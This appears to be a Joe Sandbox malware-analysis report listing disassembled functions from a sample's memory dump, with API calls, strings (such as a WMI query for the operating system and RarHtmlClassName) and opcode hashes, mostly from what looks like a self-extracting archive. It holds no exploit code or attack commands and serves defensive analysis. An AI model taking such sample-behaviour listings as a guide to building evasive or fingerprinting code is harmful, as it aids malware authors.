Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: c8f2dc74b2f936385c58a8157e2b96e47749a60a0118e8b1590bb02346a23862
Instruction ID: cb11821cd4019a3ab26c2c4eefd31b1e9a3de596dfa5915f8d1a98eada7a9eba
Opcode Fuzzy Hash: c8f2dc74b2f936385c58a8157e2b96e47749a60a0118e8b1590bb02346a23862
Instruction Fuzzy Hash: E2419272A00305EBDB109F68DC45FFEBBA8EB58710F144229F506E7751D734D8008AB5

Function 00D9CE64 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D9CE6B
VariantClear.OLEAUT32(?), ref: 00D9D015

Strings

ROOT\CIMV2, xrefs: 00D9CE99
SELECT * FROM Win32_OperatingSystem, xrefs: 00D9CF2C
Name, xrefs: 00D9CFE9
Windows 10, xrefs: 00D9CFFB
WQL, xrefs: 00D9CF3E

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: ClearH_prolog3Variant
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 3629354427-3505469590
Opcode ID: e05ce3a07ee11e7f41ce92bf7164f847671570d73f5487188cb2f6d2a8413469
Instruction ID: 69d41ab92689da941e8297ab2386addf217acfadd0b5ddc229fa4f621ee846e0
Opcode Fuzzy Hash: e05ce3a07ee11e7f41ce92bf7164f847671570d73f5487188cb2f6d2a8413469
Instruction Fuzzy Hash: 0771F571A1021AAFDF14DFA4C895EAEB7B9EF48710B14116DF516E72A0CB34AD01CB74

Function 00DA32F8 Relevance: 12.1, APIs: 8, Instructions: 131timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00DA331D

Part of subcall function 00D9D076: GetVersionExW.KERNEL32(?), ref: 00D9D0A7

FileTimeToLocalFileTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00DA3340
FileTimeToSystemTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00DA3352
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00DA3363
SystemTimeToFileTime.KERNEL32(?,?), ref: 00DA3373
SystemTimeToFileTime.KERNEL32(?,?), ref: 00DA3383
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00DA33BE
__aullrem.LIBCMT ref: 00DA3464

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 3276f69718aff883a609915ae2d3f2837bfea8ff541bbd5f129f52b18fc0a5c6
Instruction ID: cee2622488ddfa9fd094c938a2577ea7e93bc8a6a42d557e47b470aa7f3ead81
Opcode Fuzzy Hash: 3276f69718aff883a609915ae2d3f2837bfea8ff541bbd5f129f52b18fc0a5c6
Instruction Fuzzy Hash: C55127B1508346AFC710DF65C88096BFBE9FF88715F44892EF596C2210E774E949CB62

Function 00DABC7E Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DABC8A

Strings

<br>, xrefs: 00DABD7E
</p>, xrefs: 00DABD68
<style>, xrefs: 00DABDB0
</style>, xrefs: 00DABDD2
>, xrefs: 00DABCCB

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: e5da4d75c4a86fa1f4bb224a41e85b34b9ecdafb070779cec50c1990cbe8b8fb
Instruction ID: ad9d87b1440a42581a928b8be7d114f03ac5e60861cba25ed04543621f9985e5
Opcode Fuzzy Hash: e5da4d75c4a86fa1f4bb224a41e85b34b9ecdafb070779cec50c1990cbe8b8fb
Instruction Fuzzy Hash: 7F51086664535796DF305A299811BB663D0DFA27B0F6C042BFDC28B1C2FBA58D838271

Function 00DC1CDD Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00DC2452,00000000,00000000,00000000,00000000,00000000,00DB7A3D), ref: 00DC1D1F
__fassign.LIBCMT ref: 00DC1D9A
__fassign.LIBCMT ref: 00DC1DB5
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00DC1DDB
WriteFile.KERNEL32(?,00000000,00000000,00DC2452,00000000,?,?,?,?,?,?,?,?,?,00DC2452,00000000), ref: 00DC1DFA
WriteFile.KERNEL32(?,00000000,00000001,00DC2452,00000000,?,?,?,?,?,?,?,?,?,00DC2452,00000000), ref: 00DC1E33

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 1ea9e22f76681fe141c6e7b51e7837647783cb41012f3736a21184765e05ba7c
Instruction ID: 1a2d14128feeebd92db8bcc1e4d201a59488339a19eeba63851c1034b9ba2cde
Opcode Fuzzy Hash: 1ea9e22f76681fe141c6e7b51e7837647783cb41012f3736a21184765e05ba7c
Instruction Fuzzy Hash: BE514D75A0025AAFDB10CFA8D845EEEBBF8EF09310F14465AE956E7252D630D941CBB0

Function 00D9ACE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 149fileCOMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00D9AD2B
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00D9AD4A

Part of subcall function 00D9E208: _wcslen.LIBCMT ref: 00D9E210

Part of subcall function 00DA4168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00D9E084,00000000,.exe,?,?,00000800,?,?,?,00DAAD5D), ref: 00DA417E

_swprintf.LIBCMT ref: 00D9ADEC

Part of subcall function 00D94C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D94C13

MoveFileW.KERNEL32(?,?), ref: 00D9AE5E
MoveFileW.KERNEL32(?,?), ref: 00D9AE9E

Strings

rtmp%d, xrefs: 00D9ADD5

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: FileMoveNamePath$CompareLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 2133196417-3303766350
Opcode ID: 2dccff1bdb01e73ea4f2c843d40c4249980823082dee957b4e5d4bd66a674353
Instruction ID: 0c7222061c4882c6aca2ba6d1ca68b9b30edc06d162ba22551f1e0f20143dfd2
Opcode Fuzzy Hash: 2dccff1bdb01e73ea4f2c843d40c4249980823082dee957b4e5d4bd66a674353
Instruction Fuzzy Hash: 9B516D72A00619AACF20EB648C85FEF737CEF45741F0408AAB556E3141EB349A849FB1

Function 00DABE55 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 00DABE8A
GetWindowRect.USER32(?,?), ref: 00DABED1
ShowWindow.USER32(?,00000005,00000000), ref: 00DABF6C
SetWindowTextW.USER32(?,00000000), ref: 00DABF74
ShowWindow.USER32(00000000,00000005), ref: 00DABF8A

Strings

RarHtmlClassName, xrefs: 00DABF31

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 68068958dbc8e531d2f21a76dd919f906b92c0892c8f643ca45c5523e069e261
Instruction ID: c6e866cb2f854c5deb7f1b46b6ecb7730becf1f2151fc665c27c3469839dff0c
Opcode Fuzzy Hash: 68068958dbc8e531d2f21a76dd919f906b92c0892c8f643ca45c5523e069e261
Instruction Fuzzy Hash: 1F419F72509300AFCB109F64DC49BAB7BE8EF49721F19855AF949DA252CB30D805CFB1

Function 00DB4F20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00DB4F57
___except_validate_context_record.LIBVCRUNTIME ref: 00DB4F5F
_ValidateLocalCookies.LIBCMT ref: 00DB4FE8
__IsNonwritableInCurrentImage.LIBCMT ref: 00DB5013
_ValidateLocalCookies.LIBCMT ref: 00DB5068

Strings

csm, xrefs: 00DB4FFD

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 26e24c78e9dbe614b653544d52046d7f066310ddf88d0b966e7cd58569054d2a
Instruction ID: 62d65912696c05f2d965e7897c593940b60aa321f8c46bc1fe91f54b7a2f259e
Opcode Fuzzy Hash: 26e24c78e9dbe614b653544d52046d7f066310ddf88d0b966e7cd58569054d2a
Instruction Fuzzy Hash: 5B418034E00219EBCF10DF68D885AEEBBA5EF49314F188156E8169B393DB31D905CBB0

Function 00DAB8D5 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DAB8DE
_wcslen.LIBCMT ref: 00DAB913

Strings

, xrefs: 00DAB930
<br>, xrefs: 00DAB95F
 , xrefs: 00DAB9A1
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00DAB907

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: ad4f4a5315dc8adecc46bd6914006a7d3d546af360338f6d4e2f288394714e1d
Instruction ID: 39fc394dbf4852117dd8304fd92c98e7e14d936fcf3edab21cf34800c5c43bd5
Opcode Fuzzy Hash: ad4f4a5315dc8adecc46bd6914006a7d3d546af360338f6d4e2f288394714e1d
Instruction Fuzzy Hash: EA31D22264430596D630EB909C42BB7B3E4EB51330F54402FF681572C1FF61EC468BB0

Function 00DBEEF4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00DBEEB8: _free.LIBCMT ref: 00DBEEE1

_free.LIBCMT ref: 00DBEF42

Part of subcall function 00DBBAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,00DBEEE6,?,00000000,?,00000000,?,00DBEF0D,?,00000007,?,?,00DBF30A,?), ref: 00DBBB10
Part of subcall function 00DBBAFA: GetLastError.KERNEL32(?,?,00DBEEE6,?,00000000,?,00000000,?,00DBEF0D,?,00000007,?,?,00DBF30A,?,?), ref: 00DBBB22

_free.LIBCMT ref: 00DBEF4D
_free.LIBCMT ref: 00DBEF58
_free.LIBCMT ref: 00DBEFAC
_free.LIBCMT ref: 00DBEFB7
_free.LIBCMT ref: 00DBEFC2
_free.LIBCMT ref: 00DBEFCD

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
Instruction ID: ee271eeb90c145051631ed74b827dfbafc2b4b6766f682295d8c8993e292d6d3
Opcode Fuzzy Hash: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
Instruction Fuzzy Hash: 3511BA72940B04EAE520F7B1CC46FCB7BACEF08711F404815F69BA6192DAB5E505C774

Function 00DB0ACB Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00DB0B46,00DB0AA9,00DB0D4A), ref: 00DB0AE2
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00DB0AF8
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00DB0B0D

Strings

ReleaseSRWLockExclusive, xrefs: 00DB0B02
KERNEL32.DLL, xrefs: 00DB0ADD
AcquireSRWLockExclusive, xrefs: 00DB0AF2

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: 7b8e603fd635cf8048ae82f769b9b4ffb700a249c91d1128f4c77b489574c5d3
Instruction ID: f61bde21340fd485c95f00d79de59e195c4792741dd857c6603e339d2f4f18ba
Opcode Fuzzy Hash: 7b8e603fd635cf8048ae82f769b9b4ffb700a249c91d1128f4c77b489574c5d3
Instruction Fuzzy Hash: BCF0AF31752723EB1B209FA46C95EFB2A8C9E053993790439A643D3744EA50C885E2F4

Function 00DA418A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DA4192
_wcslen.LIBCMT ref: 00DA41A3
_wcslen.LIBCMT ref: 00DA41B3
_wcslen.LIBCMT ref: 00DA41C1
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00D9D2D3,?,?,00000000,?,?,?), ref: 00DA41DC

Strings

<, xrefs: 00DA41DC

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: _wcslen$CompareString
String ID: <
API String ID: 3397213944-4251816714
Opcode ID: 51c2b592f6fb5038530cd6aa40010a38ede59413e377dca891d9f02969f23d57
Instruction ID: 273c990f513303338fdcc45449b7d3b5f92f33f6f78dfa64ef4048ea7363ccf2
Opcode Fuzzy Hash: 51c2b592f6fb5038530cd6aa40010a38ede59413e377dca891d9f02969f23d57
Instruction Fuzzy Hash: EFF01D32048158BFCF121F55EC09DCA3F26EB91B70B218425F61A5B061CA72D59196F0

Function 00DA3583 Relevance: 9.1, APIs: 6, Instructions: 104timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00DA35E6

Part of subcall function 00D9D076: GetVersionExW.KERNEL32(?), ref: 00D9D0A7

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00DA360A
FileTimeToSystemTime.KERNEL32(?,?), ref: 00DA3624
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00DA3637
SystemTimeToFileTime.KERNEL32(?,?), ref: 00DA3647
SystemTimeToFileTime.KERNEL32(?,?), ref: 00DA3657

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 650b4d795458d0222d9f4e1d7a58c0724491bd2e015feb63aee11cef9486c93a
Instruction ID: eb76c3a9f444316438c5bfc45519853a2327302f787be5e1208d037386a00541
Opcode Fuzzy Hash: 650b4d795458d0222d9f4e1d7a58c0724491bd2e015feb63aee11cef9486c93a
Instruction Fuzzy Hash: 2841F576108306ABCB04DFA8C88499BB7E8FF98704F04491EF999C7310E730D909CBA6

Function 00DB511A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00DB5111,00DB4ECC,00DB21B4), ref: 00DB5128
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00DB5136
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00DB514F
SetLastError.KERNEL32(00000000,00DB5111,00DB4ECC,00DB21B4), ref: 00DB51A1

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 94c717409ef5e38dcd7fce7afc560790d7a5a3474fb5b52a4c24fd927f2db4f3
Instruction ID: 457c54a946ab71dd45a520837bf5eed29415bd643c71e7c76217430aaf30d361
Opcode Fuzzy Hash: 94c717409ef5e38dcd7fce7afc560790d7a5a3474fb5b52a4c24fd927f2db4f3
Instruction Fuzzy Hash: 6601FC32509712EDA6252B7CBC457F63B94EB113B0B64132AF112D56E4EF518C459174

Function 00DBB9A5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00DD50C4,00DB6E12,00DD50C4,?,?,00DB688D,?,?,00DD50C4), ref: 00DBB9A9
_free.LIBCMT ref: 00DBB9DC
_free.LIBCMT ref: 00DBBA04
SetLastError.KERNEL32(00000000,?,00DD50C4), ref: 00DBBA11
SetLastError.KERNEL32(00000000,?,00DD50C4), ref: 00DBBA1D
_abort.LIBCMT ref: 00DBBA23

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 17a9dda82956ffe124901f1d52121242dbf090a300aa6b010db23eeffbb32615
Instruction ID: c2fe81f4e4c0228c94bfc058a754e384d68ae409f4dba89811811f2ae0a68bdd
Opcode Fuzzy Hash: 17a9dda82956ffe124901f1d52121242dbf090a300aa6b010db23eeffbb32615
Instruction Fuzzy Hash: 12F0A436904702EBC62573266C0AEEB2A6ADFC2735F250117F617E2292FFE1CC055571

Function 00DB004D Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 00DB0059
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DB0073
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DB0084
TranslateMessage.USER32(?), ref: 00DB008E
DispatchMessageW.USER32(?), ref: 00DB0098
WaitForSingleObject.KERNEL32(?,0000000A), ref: 00DB00A3

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
